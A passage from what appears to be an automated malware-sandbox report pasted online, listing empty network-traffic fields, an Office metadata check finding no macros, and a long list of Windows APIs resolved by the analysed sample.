  376. ]
  377.  
  378. [*] Network Communication - SMTP: []
  379.  
  380. [*] Network Communication - Hosts: []
  381.  
  382. [*] Network Communication - IRC: []
  383.  
  384. [*] Static Analysis: {
  385. "office": {
  386. "Metadata": {
  387. "HasMacros": "No"
  388. }
  389. }
  390. }
  391.  
  392. [*] Resolved APIs: [
  393. "advapi32.dll.SaferIdentifyLevel",
  394. "advapi32.dll.SaferComputeTokenFromLevel",
  395. "advapi32.dll.SaferCloseLevel",
  396. "ole32.dll.CLSIDFromProgIDEx",
  397. "ole32.dll.CoGetClassObject",
  398. "wscript.exe.#1",
  399. "urlmon.dll.#326",
  400. "urlmon.dll.#327",
  401. "shell32.dll.#685",
  402. "shell32.dll.#688",
  403. "urlmon.dll.#395",
  404. "cryptsp.dll.CryptAcquireContextW",
  405. "cryptsp.dll.CryptGenRandom",
  406. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  407. "winhttp.dll.WinHttpCheckPlatform",
  408. "winhttp.dll.WinHttpOpen",
  409. "winhttp.dll.WinHttpConnect",
  410. "winhttp.dll.WinHttpOpenRequest",
  411. "winhttp.dll.WinHttpCloseHandle",
  412. "winhttp.dll.WinHttpSendRequest",
  413. "winhttp.dll.WinHttpReceiveResponse",
  414. "winhttp.dll.WinHttpAddRequestHeaders",
  415. "winhttp.dll.WinHttpQueryHeaders",
  416. "winhttp.dll.WinHttpReadData",
  417. "winhttp.dll.WinHttpWriteData",
  418. "winhttp.dll.WinHttpQueryDataAvailable",
  419. "winhttp.dll.WinHttpQueryOption",
  420. "winhttp.dll.WinHttpSetOption",
  421. "winhttp.dll.WinHttpSetTimeouts",
  422. "winhttp.dll.WinHttpCrackUrl",
  423. "winhttp.dll.WinHttpCreateUrl",
  424. "oleaut32.dll.#8",
  425. "oleaut32.dll.#12",
  426. "shlwapi.dll.StrRChrA",
  427. "shlwapi.dll.StrCmpNW",
  428. "oleaut32.dll.#4",
  429. "oleaut32.dll.#6",
  430. "kernel32.dll.RegQueryValueExW",
  431. "oleaut32.dll.#2",
  432. "kernel32.dll.RegCloseKey",
  433. "oleaut32.dll.#9",
  434. "ws2_32.dll.GetAddrInfoW",
  435. "ws2_32.dll.WSASocketW",
  436. "ws2_32.dll.#2",
  437. "ws2_32.dll.#21",
  438. "ws2_32.dll.#9",
  439. "ws2_32.dll.WSAIoctl",
  440. "ws2_32.dll.FreeAddrInfoW",
  441. "ws2_32.dll.#6",
  442. "ws2_32.dll.#5",
  443. "ws2_32.dll.WSARecv",
  444. "ws2_32.dll.WSASend",
  445. "ole32.dll.CreateStreamOnHGlobal",
  446. "oleaut32.dll.#411",
  447. "oleaut32.dll.#23",
  448. "oleaut32.dll.#24",
  449. "ole32.dll.GetHGlobalFromStream",
  450. "rpcrt4.dll.RpcBindingFree",
  451. "oleaut32.dll.#500",
  452. "cryptsp.dll.CryptReleaseContext",
  453. "cryptsp.dll.CryptAcquireContextA",
  454. "kernel32.dll.VirtualAlloc",
  455. "ntdll.dll.memcpy",
  456. "kernel32.dll.GetCurrentProcess",
  457. "kernel32.dll.CloseHandle",
  458. "advapi32.dll.OpenProcessToken",
  459. "advapi32.dll.GetTokenInformation",
  460. "kernel32.dll.Wow64EnableWow64FsRedirection",
  461. "advapi32.dll.RegCloseKey",
  462. "advapi32.dll.RegCreateKeyW",
  463. "advapi32.dll.RegOpenKeyExW",
  464. "advapi32.dll.RegSetValueExW",
  465. "shell32.dll.ShellExecuteA",
  466. "ole32.dll.OleInitialize",
  467. "cryptbase.dll.SystemFunction036",
  468. "ole32.dll.CreateBindCtx",
  469. "ole32.dll.CoTaskMemAlloc",
  470. "propsys.dll.PSCreateMemoryPropertyStore",
  471. "propsys.dll.PSPropertyBag_WriteDWORD",
  472. "ole32.dll.CoGetApartmentType",
  473. "ole32.dll.CoRegisterInitializeSpy",
  474. "ole32.dll.CoTaskMemFree",
  475. "comctl32.dll.#236",
  476. "ole32.dll.CoGetMalloc",
  477. "propsys.dll.PSPropertyBag_ReadDWORD",
  478. "propsys.dll.PSPropertyBag_ReadGUID",
  479. "comctl32.dll.#320",
  480. "comctl32.dll.#324",
  481. "comctl32.dll.#323",
  482. "advapi32.dll.RegEnumKeyW",
  483. "advapi32.dll.OpenThreadToken",
  484. "ole32.dll.StringFromGUID2",
  485. "apphelp.dll.ApphelpCheckShellObject",
  486. "ole32.dll.CoCreateInstance",
  487. "urlmon.dll.CreateUri",
  488. "kernel32.dll.InitializeSRWLock",
  489. "kernel32.dll.AcquireSRWLockExclusive",
  490. "kernel32.dll.AcquireSRWLockShared",
  491. "kernel32.dll.ReleaseSRWLockExclusive",
  492. "kernel32.dll.ReleaseSRWLockShared",
  493. "comctl32.dll.#328",
  494. "comctl32.dll.#334",
  495. "shell32.dll.#102",
  496. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
  497. "propsys.dll.PSPropertyBag_ReadStrAlloc",
  498. "ole32.dll.CoInitializeEx",
  499. "advapi32.dll.InitializeSecurityDescriptor",
  500. "advapi32.dll.SetEntriesInAclW",
  501. "ntmarta.dll.GetMartaExtensionInterface",
  502. "advapi32.dll.SetSecurityDescriptorDacl",
  503. "advapi32.dll.IsTextUnicode",
  504. "comctl32.dll.#332",
  505. "comctl32.dll.#338",
  506. "comctl32.dll.#339",
  507. "ole32.dll.CoUninitialize",
  508. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
  509. "sechost.dll.ConvertSidToStringSidW",
  510. "profapi.dll.#104",
  511. "propsys.dll.#430",
  512. "advapi32.dll.RegGetValueW",
  513. "ole32.dll.CoTaskMemRealloc",
  514. "propsys.dll.InitPropVariantFromStringAsVector",
  515. "propsys.dll.PSCoerceToCanonicalValue",
  516. "propsys.dll.PropVariantToStringAlloc",
  517. "ole32.dll.PropVariantClear",
  518. "ole32.dll.CoAllowSetForegroundWindow",
  519. "comctl32.dll.#386",
  520. "shell32.dll.SHGetFolderPathW",
  521. "advapi32.dll.SaferGetPolicyInformation",
  522. "ntdll.dll.RtlDllShutdownInProgress",
  523. "comctl32.dll.#329",
  524. "ole32.dll.OleUninitialize",
  525. "ole32.dll.CoRevokeInitializeSpy",
  526. "comctl32.dll.#388",
  527. "advapi32.dll.CryptAcquireContextA",
  528. "advapi32.dll.CryptImportKey",
  529. "advapi32.dll.CryptEncrypt",
  530. "cryptsp.dll.CryptImportKey",
  531. "cryptbase.dll.SystemFunction040",
  532. "cryptbase.dll.SystemFunction041",
  533. "cryptsp.dll.CryptEncrypt",
  534. "advapi32.dll.UnregisterTraceGuids",
  535. "comctl32.dll.#321",
  536. "kernel32.dll.SetThreadUILanguage",
  537. "kernel32.dll.CopyFileExW",
  538. "kernel32.dll.IsDebuggerPresent",
  539. "kernel32.dll.SetConsoleInputExeNameW",
  540. "kernel32.dll.SortGetHandle",
  541. "kernel32.dll.SortCloseHandle",
  542. "uxtheme.dll.ThemeInitApiHook",
  543. "user32.dll.IsProcessDPIAware",
  544. "shell32.dll.#66",
  545. "comctl32.dll.#385",
  546. "comctl32.dll.#336",
  547. "comctl32.dll.#333",
  548. "linkinfo.dll.IsValidLinkInfo",
  549. "propsys.dll.#417",
  550. "propsys.dll.PSGetNameFromPropertyKey",
  551. "propsys.dll.PSStringFromPropertyKey",
  552. "propsys.dll.InitVariantFromBuffer",
  553. "propsys.dll.PropVariantToGUID",
  554. "linkinfo.dll.CreateLinkInfoW",
  555. "user32.dll.IsCharAlphaW",
  556. "user32.dll.CharPrevW",
  557. "ntshrui.dll.GetNetResourceFromLocalPathW",
  558. "srvcli.dll.NetShareEnum",
  559. "cscapi.dll.CscNetApiGetInterface",
  560. "slc.dll.SLGetWindowsInformationDWORD",
  561. "shlwapi.dll.PathRemoveFileSpecW",
  562. "linkinfo.dll.DestroyLinkInfo",
  563. "propsys.dll.PropVariantToBoolean",
  564. "advapi32.dll.GetSecurityInfo",
  565. "advapi32.dll.SetSecurityInfo",
  566. "advapi32.dll.GetSecurityDescriptorControl",
  567. "advapi32.dll.RegQueryInfoKeyW",
  568. "advapi32.dll.RegEnumKeyExW",
  569. "advapi32.dll.RegEnumValueW",
  570. "advapi32.dll.RegQueryValueExW",
  571. "shlwapi.dll.UrlIsW",
  572. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
  573. "msvcrt.dll._set_error_mode",
  574. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
  575. "kernel32.dll.FindActCtxSectionStringW",
  576. "kernel32.dll.GetSystemWindowsDirectoryW",
  577. "mscoree.dll.GetProcessExecutableHeap",
  578. "mscorwks.dll.DllGetClassObjectInternal",
  579. "mscorwks.dll.GetCLRFunction",
  580. "advapi32.dll.RegisterTraceGuidsW",
  581. "advapi32.dll.GetTraceLoggerHandle",
  582. "advapi32.dll.GetTraceEnableLevel",
  583. "advapi32.dll.GetTraceEnableFlags",
  584. "advapi32.dll.TraceEvent",
  585. "mscoree.dll.IEE",
  586. "mscorwks.dll.IEE",
  587. "mscoree.dll.GetStartupFlags",
  588. "mscoree.dll.GetHostConfigurationFile",
  589. "mscoree.dll.GetCORSystemDirectory",
  590. "ntdll.dll.RtlVirtualUnwind",
  591. "kernel32.dll.IsWow64Process",
  592. "advapi32.dll.AllocateAndInitializeSid",
  593. "advapi32.dll.InitializeAcl",
  594. "advapi32.dll.AddAccessAllowedAce",
  595. "advapi32.dll.FreeSid",
  596. "kernel32.dll.SetThreadStackGuarantee",
  597. "kernel32.dll.FlsSetValue",
  598. "kernel32.dll.FlsGetValue",
  599. "kernel32.dll.FlsAlloc",
  600. "kernel32.dll.FlsFree",
  601. "kernel32.dll.AddVectoredContinueHandler",
  602. "kernel32.dll.RemoveVectoredContinueHandler",
  603. "advapi32.dll.ConvertSidToStringSidW",
  604. "kernel32.dll.FlushProcessWriteBuffers",
  605. "kernel32.dll.GetWriteWatch",
  606. "kernel32.dll.ResetWriteWatch",
  607. "kernel32.dll.CreateMemoryResourceNotification",
  608. "kernel32.dll.QueryMemoryResourceNotification",
  609. "kernel32.dll.GlobalMemoryStatusEx",
  610. "ole32.dll.CoGetContextToken",
  611. "oleaut32.dll.#149",
  612. "kernel32.dll.GetUserDefaultUILanguage",
  613. "kernel32.dll.GetVersionExW",
  614. "kernel32.dll.GetFullPathNameW",
  615. "kernel32.dll.SetErrorMode",
  616. "kernel32.dll.GetFileAttributesExW",
  617. "version.dll.GetFileVersionInfoSizeW",
  618. "version.dll.GetFileVersionInfoW",
  619. "version.dll.VerQueryValueW",
  620. "kernel32.dll.lstrlen",
  621. "kernel32.dll.lstrlenW",
  622. "mscoree.dll.ND_RI2",
  623. "kernel32.dll.lstrcpy",
  624. "kernel32.dll.lstrcpyW",
  625. "version.dll.VerLanguageNameW",
  626. "kernel32.dll.GetCurrentProcessId",
  627. "advapi32.dll.LookupPrivilegeValueW",
  628. "advapi32.dll.AdjustTokenPrivileges",
  629. "kernel32.dll.OpenProcess",
  630. "psapi.dll.EnumProcessModules",
  631. "psapi.dll.GetModuleInformation",
  632. "psapi.dll.GetModuleBaseNameW",
  633. "psapi.dll.GetModuleFileNameExW",
  634. "kernel32.dll.GetExitCodeProcess",
  635. "ntdll.dll.NtQuerySystemInformation",
  636. "user32.dll.EnumWindows",
  637. "user32.dll.GetWindowThreadProcessId",
  638. "kernel32.dll.WerSetFlags",
  639. "kernel32.dll.SetThreadPreferredUILanguages",
  640. "kernel32.dll.GetThreadPreferredUILanguages",
  641. "kernel32.dll.GetUserDefaultLocaleName",
  642. "kernel32.dll.GetEnvironmentVariableW",
  643. "advapi32.dll.CryptReleaseContext",
  644. "advapi32.dll.CryptCreateHash",
  645. "advapi32.dll.CryptDestroyHash",
  646. "advapi32.dll.CryptHashData",
  647. "advapi32.dll.CryptGetHashParam",
  648. "advapi32.dll.CryptExportKey",
  649. "advapi32.dll.CryptGenKey",
  650. "advapi32.dll.CryptGetKeyParam",
  651. "advapi32.dll.CryptDestroyKey",
  652. "advapi32.dll.CryptVerifySignatureA",
  653. "advapi32.dll.CryptSignHashA",
  654. "advapi32.dll.CryptGetProvParam",
  655. "advapi32.dll.CryptGetUserKey",
  656. "advapi32.dll.CryptEnumProvidersA",
  657. "cryptsp.dll.CryptHashData",
  658. "cryptsp.dll.CryptGetHashParam",
  659. "cryptsp.dll.CryptDestroyHash",
  660. "cryptsp.dll.CryptDestroyKey",
  661. "mscoree.dll.GetTokenForVTableEntry",
  662. "mscoree.dll.SetTargetForVTableEntry",
  663. "mscoree.dll.GetTargetForVTableEntry",
  664. "culture.dll.ConvertLangIdToCultureName",
  665. "ole32.dll.CoCreateGuid",
  666. "kernel32.dll.CreateFileW",
  667. "kernel32.dll.GetConsoleScreenBufferInfo",
  668. "kernel32.dll.LocalFree",
  669. "kernel32.dll.LocalAlloc",
  670. "mscoree.dll.ND_RI4",
  671. "advapi32.dll.DuplicateTokenEx",
  672. "advapi32.dll.CheckTokenMembership",
  673. "kernel32.dll.GetConsoleTitleW",
  674. "mscorjit.dll.getJit",
  675. "kernel32.dll.SetConsoleTitleW",
  676. "kernel32.dll.SetConsoleCtrlHandler",
  677. "kernel32.dll.CreateEventW",
  678. "ntdll.dll.WinSqmIsOptedIn",
  679. "kernel32.dll.ExpandEnvironmentStringsW",
  680. "shfolder.dll.SHGetFolderPathW",
  681. "kernel32.dll.SetEnvironmentVariableW",
  682. "kernel32.dll.GetACP",
  683. "kernel32.dll.UnmapViewOfFile",
  684. "kernel32.dll.GetFileType",
  685. "kernel32.dll.ReadFile",
  686. "kernel32.dll.GetSystemInfo",
  687. "kernel32.dll.VirtualQuery",
  688. "secur32.dll.GetUserNameExW",
  689. "advapi32.dll.GetUserNameW",
  690. "kernel32.dll.ReleaseMutex",
  691. "advapi32.dll.RegisterEventSourceW",
  692. "advapi32.dll.DeregisterEventSource",
  693. "advapi32.dll.ReportEventW",
  694. "kernel32.dll.GetLogicalDrives",
  695. "kernel32.dll.GetDriveTypeW",
  696. "kernel32.dll.GetVolumeInformationW",
  697. "kernel32.dll.GetCurrentDirectoryW",
  698. "kernel32.dll.GetLastError",
  699. "kernel32.dll.GetStdHandle",
  700. "kernel32.dll.GetConsoleMode",
  701. "kernel32.dll.SetEvent",
  702. "kernel32.dll.FindFirstFileW",
  703. "kernel32.dll.FindClose",
  704. "mscoree.dll.DllGetClassObject",
  705. "diasymreader.dll.DllGetClassObjectInternal",
  706. "kernel32.dll.GetConsoleOutputCP",
  707. "gdi32.dll.TranslateCharsetInfo",
  708. "kernel32.dll.SetConsoleTextAttribute",
  709. "kernel32.dll.WriteConsoleW",
  710. "mscoree.dll.CorExitProcess",
  711. "mscorwks.dll.CorExitProcess",
  712. "mscorwks.dll._CorDllMain",
  713. "kernel32.dll.CreateActCtxW",
  714. "kernel32.dll.AddRefActCtx",
  715. "kernel32.dll.ReleaseActCtx",
  716. "kernel32.dll.ActivateActCtx",
  717. "kernel32.dll.DeactivateActCtx",
  718. "kernel32.dll.GetCurrentActCtx",
  719. "kernel32.dll.QueryActCtxW",
  720. "netutils.dll.NetApiBufferFree",
  721. "kernel32.dll.IsProcessorFeaturePresent",
  722. "ntdll.dll.RtlUnwind",
  723. "mscoree.dll._CorExeMain",
  724. "mscoree.dll._CorImageUnloading",
  725. "mscoree.dll._CorValidateImage",
  726. "cryptsp.dll.CryptExportKey",
  727. "cryptsp.dll.CryptCreateHash",
  728. "kernel32.dll.SwitchToThread",
  729. "rpcrt4.dll.UuidFromStringW",
  730. "rpcrt4.dll.RpcBindingCreateW",
  731. "rpcrt4.dll.RpcBindingBind",
  732. "sechost.dll.OpenSCManagerW",
  733. "sechost.dll.OpenServiceW",
  734. "sechost.dll.StartServiceW",
  735. "sechost.dll.CloseServiceHandle",
  736. "rpcrt4.dll.RpcStringBindingComposeA",
  737. "rpcrt4.dll.RpcBindingFromStringBindingA",
  738. "rpcrt4.dll.RpcStringFreeA",
  739. "rpcrt4.dll.NdrClientCall3",
  740. "ws2_32.dll.#116",
  741. "bcryptprimitives.dll.GetHashInterface",
  742. "iphlpapi.dll.GetAdaptersAddresses",
  743. "sspicli.dll.LsaCallAuthenticationPackage",
  744. "sspicli.dll.LsaFreeReturnBuffer",
  745. "mscorsvc.dll.CorGetSvc",
  746. "advapi32.dll.StartServiceCtrlDispatcherW",
  747. "kernel32.dll.VerSetConditionMask",
  748. "kernel32.dll.VerifyVersionInfoW",
  749. "advapi32.dll.RegisterServiceCtrlHandlerExW",
  750. "advapi32.dll.SetServiceStatus",
  751. "advapi32.dll.OpenSCManagerW",
  752. "advapi32.dll.OpenServiceW",
  753. "advapi32.dll.ChangeServiceConfigW",
  754. "advapi32.dll.CloseServiceHandle",
  755. "mscoree.dll.CorIsLatestSvc",
  756. "msidle.dll.#8",
  757. "wtsapi32.dll.WTSQuerySessionInformationW",
  758. "wtsapi32.dll.WTSFreeMemory",
  759. "wtsapi32.dll.WTSEnumerateSessionsW",
  760. "winsta.dll.WinStationEnumerateW",
  761. "advapi32.dll.LookupAccountSidW",
  762. "sechost.dll.LookupAccountSidLocalW",
  763. "advapi32.dll.CreateWellKnownSid",
  764. "rpcrt4.dll.RpcStringBindingComposeW",
  765. "rpcrt4.dll.RpcBindingFromStringBindingW",
  766. "rpcrt4.dll.RpcStringFreeW",
  767. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  768. "sechost.dll.LookupAccountNameLocalW",
  769. "rpcrt4.dll.I_RpcExceptionFilter",
  770. "winsta.dll.WinStationFreeMemory",
  771. "powrprof.dll.CallNtPowerInformation",
  772. "advapi32.dll.QueryServiceConfig2W",
  773. "advapi32.dll.CreateRestrictedToken",
  774. "mscoree.dll.GetCORRootDirectory",
  775. "advapi32.dll.CreateProcessAsUserW",
  776. "advapi32.dll.EventWrite",
  777. "advapi32.dll.EventRegister",
  778. "advapi32.dll.EventUnregister",
  779. "advapi32.dll.EventEnabled",
  780. "ntdll.dll.ZwQueryInformationProcess",
  781. "ntdll.dll.NtQuerySection",
  782. "ntdll.dll.LdrProcessRelocationBlock",
  783. "sppwinob.dll.SppPluginInitialize",
  784. "sppwinob.dll.SppPluginShutdown",
  785. "sppwinob.dll.SppPluginCreateInstance",
  786. "sppwinob.dll.SppPluginCanUnloadNow",
  787. "sppobjs.dll.SppPluginInitialize",
  788. "sppobjs.dll.SppPluginShutdown",
  789. "sppobjs.dll.SppPluginCreateInstance",
  790. "sppobjs.dll.SppPluginCanUnloadNow",
  791. "sspicli.dll.GetUserNameExW",
  792. "advapi32.dll.NotifyServiceStatusChangeW",
  793. "setupapi.dll.SetupDiGetClassDevsW",
  794. "setupapi.dll.SetupDiEnumDeviceInfo",
  795. "setupapi.dll.SetupDiGetDeviceRegistryPropertyW",
  796. "setupapi.dll.SetupDiDestroyDeviceInfoList",
  797. "wintrust.dll.WinVerifyTrust",
  798. "setupapi.dll.SetupDiEnumDeviceInterfaces",
  799. "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
  800. "kernel32.dll.GetSystemFirmwareTable",
  801. "wkscli.dll.NetGetJoinInformation",
  802. "userenv.dll.UnregisterGPNotification",
  803. "gpapi.dll.UnregisterGPNotificationInternal",
  804. "ole32.dll.CoDisconnectContext",
  805. "oleaut32.dll.#285",
  806. "advapi32.dll.RegOpenKeyW",
  807. "oleaut32.dll.#286",
  808. "wbemcore.dll.Reinitialize",
  809. "wer.dll.WerReportCreate",
  810. "wer.dll.WerReportSubmit",
  811. "wer.dll.WerReportCloseHandle",
  812. "wer.dll.WerReportSetParameter",
  813. "wmisvc.dll.IsShutDown",
  814. "kernel32.dll.GetProductInfo",
  815. "ntdll.dll.EtwUnregisterTraceGuids",
  816. "comctl32.dll.LoadIconMetric"
  817. ]
  818.  
  819. [*] Static Analysis: {
  820. "office": {
  821. "Metadata": {
  822. "HasMacros": "No"
  823. }
  824. }
  825. }
Add Comment
Please, Sign In to add comment